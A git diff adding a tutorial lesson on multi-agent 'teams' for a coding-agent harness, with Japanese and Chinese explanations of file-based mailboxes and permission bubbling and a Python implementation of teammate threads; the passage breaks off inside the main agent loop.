+CC ソースコード深掘り + +> 以下は CC ソースコード `spawnMultiAgent.ts`、`useInboxPoller.ts`(969 行)、`useSwarmPermissionPoller.ts`(330 行)、`teammateMailbox.ts`、`teamHelpers.ts` の完全分析に基づきます。 + +### 一、中央メッセージバスなし — ファイルシステム + +チュートリアル版は `MessageBus` クラスでメッセージを送受信。CC のアプローチはより直接的:**各 Agent が他の Agent の受信箱ファイルに直接書き込む**。 + +受信箱パス:`~/.claude/teams/{teamName}/inboxes/{agentName}.json` + +書き込み時は `proper-lockfile` で並行安全性を保証(最大 10 リトライ)。各ファイルは JSON 配列、追記時に読み→追加→書き戻し。 + +### 二、15 種のメッセージタイプ + +CC のチーム通信には 15 の構造化メッセージがある(`teammateMailbox.ts`): + +| タイプ | 方向 | 用途 | +|------|------|------| +| `plain text` | 双方向 | 通常のチームメイト間通信 | +| `idle_notification` | チームメイト→Lead | チームメイトが 1 ターン完了、アイドル状態に | +| `permission_request` | チームメイト→Lead | 操作の承認が必要 | +| `permission_response` | Lead→チームメイト | Lead の承認結果 | +| `plan_approval_request` | チームメイト→Lead | 計画のレビュー依頼 | +| `plan_approval_response` | Lead→チームメイト | Lead の計画レビュー | +| `shutdown_request` | Lead→チームメイト | 丁寧な終了要求 | +| `shutdown_approved` | チームメイト→Lead | 終了確認 | +| `shutdown_rejected` | チームメイト→Lead | 終了拒否(理由付き) | +| `task_assignment` | Lead→チームメイト | タスク割り当て | +| `team_permission_update` | Lead→チームメイト | 権限変更のブロードキャスト | +| `mode_set_request` | Lead→チームメイト | チームメイトの権限モード変更 | +| `sandbox_permission_*` | 双方向 | ネットワーク権限リクエスト/返信 | +| `teammate_terminated` | システム | チームメイト削除通知 | + +テキストメッセージは `` XML タグでラップされモデルに配信。 + +### 三、権限バブリング:双方向ポーリング + +チュートリアル版は権限バブリングを簡略化。CC の実際のフロー(`permissionSync.ts`): + +1. **チームメイト**が承認が必要な操作に遭遇 → `permission_request` を Lead の受信箱に送信 +2. **Lead** の `useInboxPoller`(1 秒ごとにポーリング)がリクエストを検出 → `ToolUseConfirmQueue` にルーティング +3. Lead の UI にチームメイト名と色付きの承認ダイアログを表示 +4. ユーザー承認後 → Lead が `permission_response` をチームメイトの受信箱に返信 +5. **チームメイト**の `useSwarmPermissionPoller`(500ms ごとにポーリング)が返信を受信 → 実行継続または拒否 + +### 四、チームメイトライフサイクル + +CC のチームメイトは `spawnTeammate()`(`spawnMultiAgent.ts`)で作成: + +1. **Spawn**:tmux ペイン(またはプロセス内)を作成、色を割り当て、team config に書き込み +2. **Work**:`useInboxPoller` が 1 秒ごとに受信箱をチェック → 新メッセージを新しいターンとして提出 +3. **Idle**:Stop hook が発火 → `idle_notification` を Lead に送信 +4. **Shutdown**:Lead が `shutdown_request` を送信 → チームメイトが `shutdown_approved` で返信 → Lead がクリーンアップ + +### 五、Team Config + +チーム登録簿は `~/.claude/teams/{teamName}/config.json`(`teamHelpers.ts`): + +```json +{ + "name": "my-team", + "leadAgentId": "lead@my-team", + "members": [{ + "agentId": "researcher@my-team", + "name": "researcher", + "agentType": "general-purpose", + "color": "blue", + "isActive": true + }] +} +``` + +チームメイトはネスト不可(`AgentTool.tsx:273` で "teammates spawning other teammates" を明示的に禁止)。 + +
+ + diff --git a/s15_agent_teams/README.md b/s15_agent_teams/README.md new file mode 100644 index 000000000..475eb7428 --- /dev/null +++ b/s15_agent_teams/README.md @@ -0,0 +1,259 @@ +# s15: Agent Teams — 一个搞不定,组队来 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s13 → s14 → `s15` → [s16](../s16_team_protocols/) → s17 → s18 → s19 + +> *"一个搞不定, 组队来"* — 持久化队友 + 异步邮箱。 +> +> **Harness 层**: 团队 — 多 Agent 协作, 消息总线。 + +--- + +## 问题 + +饭店厨房不是一个人干所有活。厨师炒菜,帮厨备料,洗碗工洗碗——各管一摊,通过窗口传菜。如果让厨师又炒菜又洗碗,出品一定慢,碗还洗不干净。 + +Agent 也一样。"重构整个后端"涉及认证模块、数据库层、API 路由、测试。一个 Agent 在修 API 路由时会忘记认证模块的细节。上下文窗口就那么大。 + +s06 的子 Agent 是临时工——叫来干一件事就走了。但有些任务需要持久的、能随时通信的队友。 + +--- + +## 解决方案 + +![Agent Teams Overview](images/agent-teams-overview.svg) + +s14 的全部能力保留(prompt 组装、错误恢复、任务图、后台线程、cron 调度)。新增三样:**MessageBus**(文件收件箱)、**spawn_teammate_thread**(启动队友线程)、**inbox 轮询**(Lead 接收队友消息)。 + +子 Agent vs 队友: + +| | s06 子 Agent | s15 队友 | +|---|---|---| +| 生命周期 | 一次性,用完销毁 | 持久化,活到做完或被关 | +| 通信 | 只回传结论 | 异步收件箱,随时通信 | +| 上下文 | 完全隔离 | 通过消息共享信息 | +| 数量 | 一个主 Agent + 偶尔子 Agent | 一个 Lead + 多个队友 | + +--- + +## 工作原理 + +![Team Topology](images/team-topology.svg) + +### MessageBus: 文件收件箱 + +每个 Agent(包括 Lead 和队友)有一个 `.jsonl` 邮箱。发消息 = 往对方的文件里 append 一行 JSON。读消息 = 读文件 + 删除(消费式): + +```python +class MessageBus: + def send(self, from_agent: str, to_agent: str, + content: str, msg_type: str = "message"): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time()} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines()] + inbox.unlink() # 消费式:读完删除 + return msgs +``` + +为什么用文件而不是内存队列?因为文件跨线程安全(append 是原子操作),而且教学版不需要 `proper-lockfile` 这种复杂锁。CC 也用文件收件箱(`~/.claude/teams/{team}/inboxes/`),只是加了文件锁防并发写冲突。 + +### spawn_teammate_thread: 启动队友 + +Lead 调用 `spawn_teammate` 工具启动一个队友。队友跑在自己的 daemon 线程里,有自己的 system prompt、自己的 messages、自己的简化工具集: + +```python +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + system = f"You are '{name}', a {role}. Use tools to complete tasks." + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [bash, read_file, write_file, send_message] + for _ in range(10): # 最多 10 轮 + inbox = BUS.read_inbox(name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + # ... 执行工具、处理结果 + # 完成后发 summary 给 Lead + BUS.send(name, "lead", summary, "result") + + threading.Thread(target=run, daemon=True).start() +``` + +关键设计: +- **队友有简化工具集**:bash、read、write、send_message。不需要 cron、任务系统这些 Lead 专属工具 +- **最多 10 轮**:防止队友无限循环 +- **完成后自动汇报**:`BUS.send(name, "lead", summary)` 把最终结果发到 Lead 的收件箱 + +### Lead 的 inbox 轮询 + +Lead 在每轮主循环结束后检查收件箱——有没有队友发来的消息: + +```python +# 主循环结束后 +inbox = BUS.read_inbox("lead") +if inbox: + print(f"[Inbox: {len(inbox)} messages]") + for msg in inbox: + print(f" From {msg['from']}: {msg['content'][:200]}") +``` + +教学版在循环外轮询。CC 更精细——Lead 的 `useInboxPoller` 每 1 秒检查一次,有消息就提交为新的 turn。 + +### 权限冒泡 + +队友遇到需要审批的操作(比如删除文件),不能自己做主。它发 `permission_request` 消息给 Lead,Lead 来做最终决定: + +``` +teammate: "我要删除 config.py" → BUS.send("alice", "lead", "...", "permission_request") +Lead: 收到请求 → 用户审批 → BUS.send("lead", "alice", "approved") +teammate: 收到回复 → 继续执行 +``` + +教学版简化了权限冒泡——CC 有专门的 `useSwarmPermissionPoller` 每 500ms 轮询,还有结构化的 15 种消息类型。 + +### 合起来跑 + +``` +1. Lead: "搭建后端:一个人搞不定,组队吧" +2. Lead → spawn_teammate("alice", "backend dev", "创建数据库 schema") +3. Lead → spawn_teammate("bob", "frontend dev", "写 API 客户端") +4. alice 线程启动 → 自己的 LLM 调用 → bash "python manage.py migrate" +5. bob 线程启动 → 自己的 LLM 调用 → write_file("client.ts", ...) +6. alice 完成 → BUS.send("alice", "lead", "Schema done: users, orders tables") +7. bob 完成 → BUS.send("bob", "lead", "Client written with types") +8. Lead 下次循环 → check_inbox → 看到 alice 和 bob 的结果 +``` + +两个队友并行工作,Lead 不干等。 + +--- + +## 相对 s14 的变更 + +| 组件 | 之前 (s14) | 之后 (s15) | +|------|-----------|-----------| +| Agent 数量 | 1 | 1 Lead + N 持久队友线程 | +| 通信 | 无 | MessageBus + .mailboxes/*.jsonl | +| 新类 | — | MessageBus, active_teammates dict | +| 新函数 | — | spawn_teammate_thread, run_send_message, run_check_inbox | +| Lead 工具 | 10 (s14) | + spawn_teammate, send_message, check_inbox (13) | +| 队友工具 | — | bash, read_file, write_file, send_message (4) | +| 权限 | 本地决策 | 冒泡到 Lead(教学版简化) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s15_agent_teams/code.py +``` + +试试这些 prompt: + +1. `Spawn alice as a backend developer. Ask her to create a file called schema.sql with a users table.` +2. `Check your inbox for alice's result.` +3. `Spawn bob as a tester. Ask him to check if schema.sql exists and list its contents.` + +观察重点:Lead 如何启动队友?`.mailboxes/` 目录下的 JSONL 文件长什么样?队友完成后 Lead 的 inbox 有没有收到消息? + +--- + +## 接下来 + +队友能干活、能通信。但如果 Lead 想让 Alice 关机,直接杀线程会留下写到一半的文件。需要一个体面的握手协议——"请关机"→"好的,我收尾完就关"。 + +s16 Team Protocols → 队友之间也需要约定。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `spawnMultiAgent.ts`、`useInboxPoller.ts`(969 行)、`useSwarmPermissionPoller.ts`(330 行)、`teammateMailbox.ts`、`teamHelpers.ts` 的完整分析。 + +### 一、没有中央消息总线——是文件系统 + +教学版用 `MessageBus` 类收发消息。CC 的做法更直接:**每个 Agent 直接写其他 Agent 的收件箱文件**。 + +收件箱路径:`~/.claude/teams/{teamName}/inboxes/{agentName}.json` + +写入时用 `proper-lockfile` 文件锁保证并发安全(最多重试 10 次)。每个文件是一个 JSON 数组,append 新消息时读→追加→写回。 + +### 二、15 种消息类型 + +CC 的团队通信有 15 种结构化消息(`teammateMailbox.ts`): + +| 类型 | 方向 | 用途 | +|------|------|------| +| `plain text` | 双向 | 普通队友间通信 | +| `idle_notification` | 队友→Lead | 队友完成一轮工作,进入空闲 | +| `permission_request` | 队友→Lead | 队友需要操作审批 | +| `permission_response` | Lead→队友 | Lead 审批结果 | +| `plan_approval_request` | 队友→Lead | 队友提交计划待审 | +| `plan_approval_response` | Lead→队友 | Lead 审批计划 | +| `shutdown_request` | Lead→队友 | 请求体面关机 | +| `shutdown_approved` | 队友→Lead | 确认关机 | +| `shutdown_rejected` | 队友→Lead | 拒绝关机(附原因) | +| `task_assignment` | Lead→队友 | 分配任务 | +| `team_permission_update` | Lead→队友 | 广播权限变更 | +| `mode_set_request` | Lead→队友 | 修改队友的权限模式 | +| `sandbox_permission_*` | 双向 | 网络权限请求/回复 | +| `teammate_terminated` | 系统 | 队友被移除通知 | + +文本消息被包装在 `` XML 标签中交付给模型。 + +### 三、权限冒泡:双向轮询 + +教学版简化了权限冒泡。CC 的实际流程(`permissionSync.ts`): + +1. **队友**遇到需要审批的操作 → 发 `permission_request` 到 Lead 的收件箱 +2. **Lead** 的 `useInboxPoller`(每 1 秒轮询)检测到请求 → 路由到 `ToolUseConfirmQueue` +3. Lead 的 UI 显示审批对话框,带队友名字和颜色 +4. 用户审批后 → Lead 发 `permission_response` 回队友的收件箱 +5. **队友**的 `useSwarmPermissionPoller`(每 500ms 轮询)收到回复 → 继续或拒绝执行 + +### 四、队友生命周期 + +CC 的队友由 `spawnTeammate()`(`spawnMultiAgent.ts`)创建: + +1. **Spawn**:创建 tmux 窗格(或进程内),分配颜色,写入 team config +2. **Work**:`useInboxPoller` 每 1 秒检查收件箱 → 有消息就提交为新的 turn +3. **Idle**:Stop hook 触发 → 发 `idle_notification` 给 Lead +4. **Shutdown**:Lead 发 `shutdown_request` → 队友回复 `shutdown_approved` → Lead 清理 + +### 五、Team Config + +团队注册表在 `~/.claude/teams/{teamName}/config.json`(`teamHelpers.ts`): + +```json +{ + "name": "my-team", + "leadAgentId": "lead@my-team", + "members": [{ + "agentId": "researcher@my-team", + "name": "researcher", + "agentType": "general-purpose", + "color": "blue", + "isActive": true + }] +} +``` + +队友之间不能嵌套(`AgentTool.tsx:273` 明确禁止 "teammates spawning other teammates")。 + +
+ + diff --git a/s15_agent_teams/code.py b/s15_agent_teams/code.py new file mode 100644 index 000000000..3da8cfcf6 --- /dev/null +++ b/s15_agent_teams/code.py @@ -0,0 +1,734 @@ +#!/usr/bin/env python3 +""" +s15: Agent Teams — MessageBus + spawn_teammate_thread + inbox polling. + +Run: python s15_agent_teams/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s14: + - MessageBus class: file-based mailboxes (.mailboxes/*.jsonl) + - spawn_teammate_thread: creates teammate in background thread + - Teammate runs own simplified agent_loop (bash, read, write, send_message) + - Lead tools: spawn_teammate, send_message, check_inbox (3 new) + - Lead checks inbox after each turn for teammate responses + - Permission bubbling: simplified (teammate → Lead inbox) + +ASCII flow: + Lead: cron_queue → messages → prompt → LLM → TOOLS ────→ loop + ↑ ↓ | + └── inbox ← MessageBus ← teammate.send_message ←┘ + Teammate: inbox → LLM → bash/read/write/send → loop (max 10 turns) +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12, unchanged) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob, " + "create_task, list_tasks, claim_task, complete_task, " + "schedule_cron, list_crons, cancel_cron, " + "spawn_teammate, send_message, check_inbox.", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "team": "You can spawn teammate agents for parallel work. " + "Use send_message to communicate, check_inbox to read replies.", + "cron": "Use schedule_cron for recurring or scheduled tasks.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("has_team"): + sections.append(PROMPT_SECTIONS["team"]) + if context.get("has_cron"): + sections.append(PROMPT_SECTIONS["cron"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (from s14, unchanged) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + fp = safe_path(path) + fp.parent.mkdir(parents=True, exist_ok=True) + fp.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> str: + task = create_task(subject, description, blockedBy) + deps = f" (blockedBy: {', '.join(blockedBy)})" if blockedBy else "" + print(f" \033[34m[create] {task.subject}{deps}\033[0m") + return f"Created {task.id}: {task.subject}{deps}" + + +def run_list_tasks() -> str: + tasks = list_tasks() + if not tasks: + return "No tasks." + lines = [] + for t in tasks: + icon = {"pending": "○", "in_progress": "●", + "completed": "✓"}.get(t.status, "?") + deps = f" (blockedBy: {', '.join(t.blockedBy)})" if t.blockedBy else "" + owner = f" [{t.owner}]" if t.owner else "" + lines.append(f" {icon} {t.id}: {t.subject} [{t.status}]{owner}{deps}") + return "\n".join(lines) + + +def run_claim_task(task_id: str) -> str: + return claim_task(task_id, owner="agent") + + +def run_complete_task(task_id: str) -> str: + return complete_task(task_id) + + +# ── Background Tasks (from s13, unchanged) ── + +background_results: dict[str, str] = {} +background_lock = threading.Lock() + + +def is_slow_operation(tool_name: str, tool_input: dict) -> bool: + if tool_name != "bash": + return False + cmd = tool_input.get("command", "").lower() + return any(kw in cmd for kw in + ["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install"]) + + +def run_in_background(tool_use_id: str, fn, *args): + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + threading.Thread(target=worker, daemon=True).start() + + +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + return ready + + +# ── Cron Scheduler (from s14, unchanged) ── + +DURABLE_PATH = WORKDIR / ".scheduled_tasks.json" + + +@dataclass +class CronJob: + id: str + cron: str + prompt: str + recurring: bool + durable: bool + + +scheduled_jobs: dict[str, CronJob] = {} +cron_queue: list[CronJob] = [] +cron_lock = threading.Lock() +_last_fired: dict[str, int] = {} + + +def _cron_field_matches(field: str, value: int) -> bool: + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return any(_cron_field_matches(f.strip(), value) + for f in field.split(",")) + if "-" in field: + lo, hi = field.split("-", 1) + return int(lo) <= value <= int(hi) + return value == int(field) + + +def cron_matches(cron_expr: str, dt: datetime) -> bool: + fields = cron_expr.strip().split() + if len(fields) != 5: + return False + minute, hour, dom, month, dow = fields + dow_val = (dt.weekday() + 1) % 7 + return all([ + _cron_field_matches(minute, dt.minute), + _cron_field_matches(hour, dt.hour), + _cron_field_matches(dom, dt.day), + _cron_field_matches(month, dt.month), + _cron_field_matches(dow, dow_val), + ]) + + +def save_durable_jobs(): + durable = [asdict(j) for j in scheduled_jobs.values() if j.durable] + DURABLE_PATH.write_text(json.dumps(durable, indent=2)) + + +def load_durable_jobs(): + if not DURABLE_PATH.exists(): + return + try: + for j in json.loads(DURABLE_PATH.read_text()): + job = CronJob(**j) + scheduled_jobs[job.id] = job + except Exception: + pass + + +def schedule_job(cron: str, prompt: str, recurring: bool = True, + durable: bool = True) -> CronJob: + job = CronJob(id=f"cron_{random.randint(0, 999999):06d}", + cron=cron, prompt=prompt, + recurring=recurring, durable=durable) + with cron_lock: + scheduled_jobs[job.id] = job + if durable: + save_durable_jobs() + return job + + +def cron_scheduler_loop(): + while True: + time.sleep(1) + now = datetime.now() + minute_marker = now.hour * 60 + now.minute + with cron_lock: + for job in list(scheduled_jobs.values()): + if cron_matches(job.cron, now): + if _last_fired.get(job.id) != minute_marker: + cron_queue.append(job) + _last_fired[job.id] = minute_marker + print(f" \033[35m[cron fire] {job.prompt[:40]}\033[0m") + if not job.recurring: + scheduled_jobs.pop(job.id, None) + if job.durable: + save_durable_jobs() + + +def consume_cron_queue() -> list[CronJob]: + with cron_lock: + fired = list(cron_queue) + cron_queue.clear() + return fired + + +load_durable_jobs() +threading.Thread(target=cron_scheduler_loop, daemon=True).start() + + +# Cron tool handlers +def run_schedule_cron(cron: str, prompt: str, + recurring: bool = True, durable: bool = True) -> str: + job = schedule_job(cron, prompt, recurring, durable) + print(f" \033[35m[cron] {job.id}: '{cron}'\033[0m") + return f"Scheduled {job.id}: '{cron}' → {prompt}" + + +def run_list_crons() -> str: + with cron_lock: + jobs = list(scheduled_jobs.values()) + if not jobs: + return "No cron jobs." + return "\n".join( + f" {j.id}: '{j.cron}' → {j.prompt[:40]} " + f"[{'R' if j.recurring else '1x'}, {'D' if j.durable else 'S'}]" + for j in jobs) + + +def run_cancel_cron(job_id: str) -> str: + with cron_lock: + job = scheduled_jobs.pop(job_id, None) + if not job: + return f"Job {job_id} not found" + if job.durable: + save_durable_jobs() + return f"Cancelled {job_id}" + + +# ── MessageBus (s15 new) ── + +MAILBOX_DIR = WORKDIR / ".mailboxes" +MAILBOX_DIR.mkdir(exist_ok=True) + + +class MessageBus: + """File-based message bus. Each agent has a .jsonl inbox.""" + + def send(self, from_agent: str, to_agent: str, content: str, + msg_type: str = "message"): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time()} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + print(f" \033[33m[bus] {from_agent} → {to_agent}: " + f"{content[:50]}\033[0m") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines() + if line.strip()] + inbox.unlink() + return msgs + + +BUS = MessageBus() + +# Track spawned teammates +active_teammates: dict[str, bool] = {} + + +# ── Teammate Thread (s15 new) ── + +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + """Spawn a teammate agent in a background thread.""" + if name in active_teammates: + return f"Teammate '{name}' already exists" + + system = (f"You are '{name}', a {role}. " + f"Use tools to complete tasks. " + f"Send results via send_message to 'lead'.") + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "send_message", + "description": "Send a message to another agent.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + ] + sub_handlers = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "send_message": lambda to, content: (BUS.send(name, to, content), + "Sent")[1], + } + + for _ in range(10): + inbox = BUS.read_inbox(name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + except Exception: + break + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = sub_handlers.get(block.name) + output = handler(**block.input) if handler else "Unknown" + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + + # Send final summary to Lead + summary = "Done." + for msg in reversed(messages): + if msg["role"] == "assistant" and isinstance(msg["content"], list): + for b in msg["content"]: + if getattr(b, "type", None) == "text": + summary = b.text + break + else: + continue + break + BUS.send(name, "lead", summary, "result") + active_teammates.pop(name, None) + print(f" \033[32m[teammate] {name} finished\033[0m") + + active_teammates[name] = True + threading.Thread(target=run, daemon=True).start() + print(f" \033[36m[teammate] {name} spawned as {role}\033[0m") + return f"Teammate '{name}' spawned as {role}" + + +# ── Team Tool Handlers (s15 new) ── + +def run_spawn_teammate(name: str, role: str, prompt: str) -> str: + return spawn_teammate_thread(name, role, prompt) + + +def run_send_message(to: str, content: str) -> str: + BUS.send("lead", to, content) + return f"Sent to {to}" + + +def run_check_inbox() -> str: + msgs = BUS.read_inbox("lead") + if not msgs: + return "(inbox empty)" + lines = [] + for m in msgs: + lines.append(f" [{m['from']}] {m['content'][:200]}") + return "\n".join(lines) + + +# ── Tool Dispatch (shared) ── + +def execute_tool(block) -> str: + handlers = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "schedule_cron": run_schedule_cron, "list_crons": run_list_crons, + "cancel_cron": run_cancel_cron, + "spawn_teammate": run_spawn_teammate, + "send_message": run_send_message, "check_inbox": run_check_inbox, + } + handler = handlers.get(block.name) + return handler(**block.input) if handler else f"Unknown: {block.name}" + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a task with optional blockedBy dependencies.", + "input_schema": {"type": "object", + "properties": { + "subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "schedule_cron", + "description": "Schedule a cron job (5-field expression).", + "input_schema": {"type": "object", + "properties": { + "cron": {"type": "string"}, + "prompt": {"type": "string"}, + "recurring": {"type": "boolean"}, + "durable": {"type": "boolean"}}, + "required": ["cron", "prompt"]}}, + {"name": "list_crons", + "description": "List all cron jobs.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "cancel_cron", + "description": "Cancel a cron job.", + "input_schema": {"type": "object", + "properties": {"job_id": {"type": "string"}}, + "required": ["job_id"]}}, + {"name": "spawn_teammate", + "description": "Spawn a persistent teammate agent in a background thread.", + "input_schema": {"type": "object", + "properties": { + "name": {"type": "string"}, + "role": {"type": "string"}, + "prompt": {"type": "string"}}, + "required": ["name", "role", "prompt"]}}, + {"name": "send_message", + "description": "Send a message to a teammate via MessageBus.", + "input_schema": {"type": "object", + "properties": {"to": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["to", "content"]}}, + {"name": "check_inbox", + "description": "Check Lead's inbox for teammate messages.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, +] + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_cron": "cron" in text or "schedule" in text, + "has_team": "teammate" in text or "spawn" in text or "inbox" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + # Consume cron jobs + for job in consume_cron_queue(): + messages.append({"role": "user", + "content": f"[Scheduled] {job.prompt}"}) + + try: + response = client.messages.create( + 